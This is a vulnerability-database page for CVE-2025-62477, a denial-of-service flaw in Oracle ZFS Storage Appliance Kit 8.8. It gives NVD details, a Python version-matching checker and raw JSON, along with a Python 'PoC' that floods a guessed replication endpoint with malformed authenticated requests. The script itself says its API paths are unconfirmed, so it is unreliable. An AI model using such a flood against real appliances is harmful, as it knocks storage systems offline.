Security Vulnerability Report
CVE-2025-62477 CVSS 4.9 MEDIUM

Published: 2025-10-21 20:20:54
Last Modified: 2025-10-23 16:02:49

Description

Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Remote Replication). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

CVSS Details

CVSS Score: 4.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H
Exploitability Subscore: 1.2
Impact Subscore: 3.6
Weakness: CWE-400 (Uncontrolled Resource Consumption)

Configurations (Affected Products)

cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:* - VULNERABLE
Oracle ZFS Storage Appliance Kit 8.8
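The affected-product entry above is a single exact-version CPE, so the useful check is whether a given appliance in inventory falls inside it. The evaluator below is an added example, not part of this page's NVD record: the configuration block is copied from the Raw JSON on this page, the inventory lines are constructed, and the `release_line` helper rests on an assumption not in the record, namely that the appliance reports its software as an "OS8.8.x"-style string while the CPE carries only "8.8". The matcher also applies NVD's versionStartIncluding/versionEndExcluding range fields, which this CVE does not use, so the same function works on range-based records.

```python
"""Decide whether an inventory entry falls inside an NVD vulnerable configuration
(added example, not part of this page's NVD record)."""

import re

# Configuration block copied from the CVE-2025-62477 NVD record on this page.
CVE_2025_62477_CONFIGURATIONS = [
    {
        "nodes": [
            {
                "operator": "OR",
                "negate": False,
                "cpeMatch": [
                    {
                        "vulnerable": True,
                        "criteria": "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*",
                        "matchCriteriaId": "D3E503FB-6279-4D4A-91D8-E237ECF9D2B0",
                    }
                ],
            }
        ]
    }
]

CPE23_FIELDS = ("cpe", "cpe_version", "part", "vendor", "product", "version", "update",
                "edition", "language", "sw_edition", "target_sw", "target_hw", "other")


def parse_cpe23(cpe: str) -> dict:
    """Split a CPE 2.3 formatted string on unescaped ':' into its 13 named fields."""
    fields = re.split(r"(?<!\\):", cpe)
    if len(fields) != len(CPE23_FIELDS) or fields[0] != "cpe" or fields[1] != "2.3":
        raise ValueError(f"not a CPE 2.3 formatted string: {cpe}")
    return dict(zip(CPE23_FIELDS, fields))


def version_key(version: str) -> tuple:
    """Tokenise '8.8.60' into a comparable tuple; numeric tokens compare as integers
    and sort before alphabetic ones, so '8.10' > '8.8' and '8.8' < '8.8.60'."""
    return tuple((0, int(t)) if t.isdigit() else (1, t)
                 for t in re.split(r"[.\-_]", version))


def cpe_match(entry: dict, part: str, vendor: str, product: str, version: str) -> bool:
    """Apply one cpeMatch entry. An exact-version criterion (this CVE) needs an exact
    hit; a wildcard-version criterion is bounded by NVD's versionStart*/versionEnd* fields."""
    crit = parse_cpe23(entry["criteria"])
    for field, value in (("part", part), ("vendor", vendor), ("product", product)):
        if crit[field] not in ("*", value):
            return False
    if crit["version"] != "*":
        return crit["version"] == version
    vk = version_key(version)
    if "versionStartIncluding" in entry and vk < version_key(entry["versionStartIncluding"]):
        return False
    if "versionStartExcluding" in entry and vk <= version_key(entry["versionStartExcluding"]):
        return False
    if "versionEndIncluding" in entry and vk > version_key(entry["versionEndIncluding"]):
        return False
    if "versionEndExcluding" in entry and vk >= version_key(entry["versionEndExcluding"]):
        return False
    return True


def is_affected(configurations: list, part: str, vendor: str, product: str, version: str) -> bool:
    """True if any configuration places (part, vendor, product, version) in the vulnerable set.
    Entries with "vulnerable": false are platform context (the OS or hardware the product
    runs on); this example carries no platform inventory and skips them."""
    def node_matches(node: dict) -> bool:
        hits = [cpe_match(e, part, vendor, product, version)
                for e in node.get("cpeMatch", []) if e.get("vulnerable", True)]
        if node.get("operator", "OR") == "AND":
            result = bool(hits) and all(hits)
        else:
            result = any(hits)
        return (not result) if node.get("negate", False) else result

    for config in configurations:
        nodes = config.get("nodes", [])
        if config.get("operator", "OR") == "AND":
            matched = bool(nodes) and all(node_matches(n) for n in nodes)
        else:
            matched = any(node_matches(n) for n in nodes)
        if matched:
            return True
    return False


def release_line(appliance_version: str) -> str:
    """Map an appliance-reported version to NVD's granularity.
    Assumption, not from the NVD record: the appliance reports 'OS8.8.60'-style strings
    while the CPE carries only '8.8', so strip the 'OS' prefix and keep major.minor."""
    v = appliance_version.strip()
    if v.upper().startswith("OS"):
        v = v[2:]
    return ".".join(v.split(".")[:2])


if __name__ == "__main__":
    # Constructed inventory: (hostname, version string as the appliance reports it).
    inventory = [("zs-prod-01", "OS8.8.60"), ("zs-lab-02", "OS8.7.20")]
    for host, reported in inventory:
        hit = is_affected(CVE_2025_62477_CONFIGURATIONS, "a", "oracle",
                          "zfs_storage_appliance_kit", release_line(reported))
        print(f"{host:12} {reported:10} affected={hit}")
```

Because the record names only "8.8" with no update-level detail, a hit from this check means "on the affected release line", not "unpatched"; the Oracle advisory linked under References is what says whether a particular update already carries the fix.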

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62477 - Oracle ZFS Storage Appliance Kit Remote Replication DoS PoC
# This PoC demonstrates a Denial of Service attack against the Remote Replication component
# Note: Requires high-privileged credentials (PR:H) to exploit
#
# Caveat: the Oracle Critical Patch Update advisory referenced on this page publishes
# no technical details for this CVE. The API paths, the JSON-token login flow and the
# replication payload fields below are the PoC author's assumptions and are not
# confirmed by the vendor; what the script actually does is flood a guessed endpoint
# with authenticated requests. (The documented ZFSSA RESTful API logs in on
# /api/access/v1 with X-Auth-User / X-Auth-Key request headers and returns an
# X-Auth-Session header, not a JSON bearer token.)
import sys

import requests
import urllib3

# verify=False is used on every request below; silence the per-request
# InsecureRequestWarning so it does not drown the progress output.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Target configuration
TARGET_HOST = "https://target-zfs-appliance:215"  # 215 is the ZFSSA BUI/REST management port
USERNAME = "admin"  # High-privileged account required
PASSWORD = "password123"

# Remote Replication API endpoint (assumed path, see caveat above)
REPLICATION_ENDPOINT = f"{TARGET_HOST}/api/remote-replication/v1/actions"


def authenticate(session, username, password):
    """Authenticate to the Oracle ZFS Storage Appliance Kit; return a token or None."""
    login_url = f"{TARGET_HOST}/api/access/v1/tokens"  # assumed path, see caveat above
    payload = {"username": username, "password": password}
    headers = {"Content-Type": "application/json"}
    try:
        response = session.post(login_url, json=payload, headers=headers, verify=False)
        if response.status_code in (200, 201):
            return response.json().get("token", "")
    except Exception as e:
        print(f"[-] Authentication failed: {e}")
    return None


def trigger_dos(session, token):
    """Trigger the DoS vulnerability in the Remote Replication component"""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    }
    # Malformed payload designed to trigger the vulnerability
    # Sending excessive replication action requests to cause system hang/crash
    payload = {
        "action": "replicate",
        "source": "project1/share1",
        "target": "project2/share2",
        "properties": {
            "bandwidth_limit": "0",      # Zero bandwidth limit may cause resource exhaustion
            "retention": "-1",           # Invalid retention value
            "compression": "invalid",
            "max_snapshots": 999999999,  # Excessive snapshot count
        },
    }
    print("[*] Sending malicious replication request...")
    for i in range(100):
        try:
            response = session.post(
                REPLICATION_ENDPOINT,
                json=payload,
                headers=headers,
                verify=False,
                timeout=5,
            )
            print(f"[*] Request {i+1}: Status {response.status_code}")
        except requests.exceptions.Timeout:
            print(f"[*] Request {i+1}: Timeout (possible DoS triggered)")
        except Exception as e:
            print(f"[*] Request {i+1}: Error - {e}")
    print("[*] DoS attack completed. Target system may be in hung/crashed state.")


def main():
    session = requests.Session()
    print(f"[*] Target: {TARGET_HOST}")
    print("[*] CVE-2025-62477 - Oracle ZFS Storage Appliance Kit DoS PoC")

    # Step 1: Authenticate
    print("[*] Authenticating...")
    token = authenticate(session, USERNAME, PASSWORD)
    if not token:
        print("[-] Failed to obtain authentication token")
        sys.exit(1)
    print("[+] Authentication successful")

    # Step 2: Trigger the vulnerability
    trigger_dos(session, token)


if __name__ == "__main__":
    main()

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory: Oracle Critical Patch Update, October 2025)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-62477",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-21T20:20:54.363",
    "lastModified": "2025-10-23T16:02:49.087",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Remote Replication). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-400"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*",
                "matchCriteriaId": "D3E503FB-6279-4D4A-91D8-E237ECF9D2B0"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.oracle.com/security-alerts/cpuoct2025.html",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}